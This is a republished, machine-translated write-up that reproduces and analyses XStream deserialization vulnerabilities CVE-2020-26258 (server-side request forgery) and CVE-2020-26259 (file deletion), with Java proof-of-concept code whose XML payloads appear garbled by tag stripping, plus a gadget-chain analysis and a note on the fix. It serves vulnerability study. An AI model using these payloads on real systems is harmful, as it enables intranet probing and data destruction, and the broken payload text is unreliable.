In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
It is believed that many inexperienced people have no idea about the reproduction and analysis of XStream deserialization vulnerabilities CVE-2020-26258 and 26259. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.
Xstream is a Java class library that is used to serialize objects into XML (JSON) or deserialize them. XStream is open source software that allows distribution under the BSD license.
0x01 vulnerability description
Xstream did not deal completely with CVE-2020-26217 last time. Although it prevents remote code execution by blacklisting, it can still use similar ideas to delete files and forge server requests.
Affect the version
Xstream
< = 1.4.14 修复版本 Xstream >= 1.4.15
Risk level
Serious
The PoC of 0x02 PoCCVE-2020-26258 is as follows: import com.thoughtworks.xstream.XStream / * CVE-2020-26258: a Server-Side Forgery Request can be activated unmarshallingwith XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.All versions until and including version 1.4.14 https://x-stream.github.io/CVE-2020-26258.htmlSecurity framework of XStream not explicitly initialized Using predefined black list on your own risk.*/public class CVE_2020_26258 {public static void main (String [] args) {String ssrf_xml = "\ n" + "\ n" + "http://localhost:8989/internal/:\n" +"\ n "+"\ n "+"\ n "+" 0\ n "+"\ n "+"\ n "+" test\ n "+"\ n "+"\ n "+" XStream xstream = new XStream (); xstream.fromXML (ssrf_xml);}} CVE-2020-26259 PoC is as follows: import com.thoughtworks.xstream.XStream / * CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local hostwhen unmarshalling as long as the executing process has sufficient rights. https://x-stream.github.io/CVE-2020-26259.htmlSecurity framework of XStream not explicitly initialized Using predefined black list on your own risk.*/public class CVE_2020_26259 {public static void main (String [] args) {String xml_poc = "\ n" + "\ n" + "\ n" + "0\ n" + "\ n" + "\ n" + "text/plain\ n" + "\ n" + "\ n" + / tmp/CVE-2020-26259 "+"\ n "+"\ n "+" 0\ n "+"\ n "+"\ n "+" test\ n "+"\ n "+"\ n "+" XStream xstream = new XStream (); xstream.fromXML (xml_poc);}} 0x03 vulnerability details reproduce process environment
Idea to build a maven project. Use the above PoC,pom file as follows:
4.0.0111.0-SNAPSHOTcom.thoughtworks.xstreamxstream1.4.14
Just run it directly.
Reappearance
CVE-2020-26258
Open a temporary service using flask
Run PoC to receive the request
CVE-2020-26259
Before running PoC:
After running PoC:
Loophole analysis
These two vulnerabilities are basically similar to the last CVE-2020-26217, mainly using Xstream to check for the existence of entry when deserializing map objects: if so, the hashCode function of entry is called during the construction of this entry. Both CVE-2020-26217 and this one use jdk.nashorn.internal.objects.NativeString 's hashCode function.
Debugging and analysis
Deserialize using xstream's fromXml:
Follow up to putCurrentEntryIntoMap, and in the process of building entry by Xstream, transfer the key value, that is, NativeString, put, provided by us, to map:
The put process performs one-step hash operation:
In hash, we call the hashCode function of key, that is, the hashCode function of jdk.nashorn.internal.objects.NativeString that we entered.
The hashCode function of NativeString calls getStringValue, which in turn calls the toString function of its value, and this value is the com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data we provide.
Base64Data's toString calls its get.
So far, these two vulnerabilities are consistent with CVE-2020-26217. CVE-2020-26217 leverages readFrom and its successors, but because the Xstream blacklist restricts remote code execution, getInputStream and close are used here for ssrf and file deletion.
InputStream is = this.dataHandler.getDataSource () .getInputStream (); is where the ssrf is triggered, using the getInputStream function of javax.activation.URLDataSource:
The getInputStream function of URLDataSource is to access the incoming url.
File deletion is done in ReadAllStream's close.
Repair analysis
Add a blacklist.
After reading the above, have you mastered the method of reproduction and analysis of XStream deserialization vulnerabilities CVE-2020-26258 and 26259? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.